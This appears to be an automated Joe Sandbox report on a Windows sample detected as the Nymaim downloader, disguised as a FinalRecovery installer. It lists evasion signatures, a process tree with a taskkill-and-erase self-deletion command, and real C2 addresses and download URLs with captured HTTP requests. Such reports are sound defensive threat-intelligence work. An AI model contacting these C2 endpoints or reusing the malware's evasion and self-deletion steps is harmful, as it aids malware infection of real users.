Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:791306
MD5:209dca1a9633807b9cf36d6447f972da
SHA1:c4235ac91cd8e3c0e70ede54e43f857709f00859
SHA256:2004da2c60d73a66c6feffe50f130483750da799b90a78c76da90f61208101e6
Tags:exe
Infos:

Detection

Nymaim
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Obfuscated command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to launch a program with higher privileges
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 408 cmdline: C:\Users\user\Desktop\file.exe MD5: 209DCA1A9633807B9CF36D6447F972DA)
    • file.tmp (PID: 3600 cmdline: "C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe" MD5: D76329B30DB65F61D55B20F36B56DA26)
      • finalrecovery.exe (PID: 6024 cmdline: "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" MD5: 04947B1020E31A5F5A6E41FD279B4E74)
        • wEQg8.exe (PID: 5996 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 68 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 1336 cmdline: taskkill /im "finalrecovery.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.finalrecovery.exe.19a0000.3.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
        2.2.finalrecovery.exe.400000.1.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          2.2.finalrecovery.exe.19a0000.3.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            2.2.finalrecovery.exe.400000.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:45.12.253.72192.168.2.380497022852925 01/25/23-10:17:06.150578
              SID:2852925
              Source Port:80
              Destination Port:49702
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exeReversingLabs: Detection: 60%
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeJoe Sandbox ML: detected
              Source: 1.2.file.tmp.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 0.2.file.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 0.3.file.exe.23c75c8.0.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 1.0.file.tmp.4b375c.3.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 0.3.file.exe.21db608.3.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 1.2.file.tmp.4b375c.3.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 2.2.finalrecovery.exe.19a0000.3.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.12.253.56", "45.12.253.72", "45.12.253.98", "45.12.253.75"]}
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045C524 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045C5D8 ArcFourCrypt,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_0045C5F0 ArcFourCrypt,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_10001000 ISCryptGetVersion,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_10001130 ArcFourCrypt,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

              Compliance

              barindex
              Detected unpacking (overwrites its own PE header)
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeUnpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack
              Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00451DC0 FindFirstFileA,GetLastError,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmpCode function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00423DAD FindFirstFileExW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007E39 FindFirstFileExW,

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 45.12.253.72:80 -> 192.168.2.3:49702
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 45.12.253.56
              Source: Malware configuration extractorIPs: 45.12.253.72
              Source: Malware configuration extractorIPs: 45.12.253.98
              Source: Malware configuration extractorIPs: 45.12.253.75
              Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
              Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
              Source: Joe Sandbox ViewIP Address: 45.12.253.72 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.56
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: unknownTCP traffic detected without corresponding DNS query: 45.12.253.72
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteY
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteeF
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/puk.php
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/stuk.php
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.72/default/stuk.php2N
              Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.php
              Source: finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpK
              Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpL
              Source: finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpQ
              Source: finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpc
              Source: finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpd
              Source: finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpi
              Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpr
              Source: finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phprl
              Source: finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.12.253.75/dll.phpx
              Source: file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://nbafrog.com/
              Source: file.exe, 00000000.00000003.324486104.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241488665.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.242648810.00000000022D8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://nbafrog.com/.
              Source: is-6R8AD.tmp.1.drString found in binary or memory: http://www.finalrecovery.com/buy.htm
              Source: file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.drString found in binary or memory: http://www.innosetup.com/
              Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
              Source: file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
              Source: global trafficHTTP traffic detected: GET /advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.56Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /default/stuk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /default/puk.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: OKHost: 45.12.253.72Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dll.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: BHost: 45.12.253.75Connection: Keep-AliveCache-Control: no-cache
              Source: file.exe, 00000000.00000002.324966224.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              barindex
              Yara detected Nymaim
              Source: Yara matchFile source: 2.2.finalrecovery.exe.19a0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.19a0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
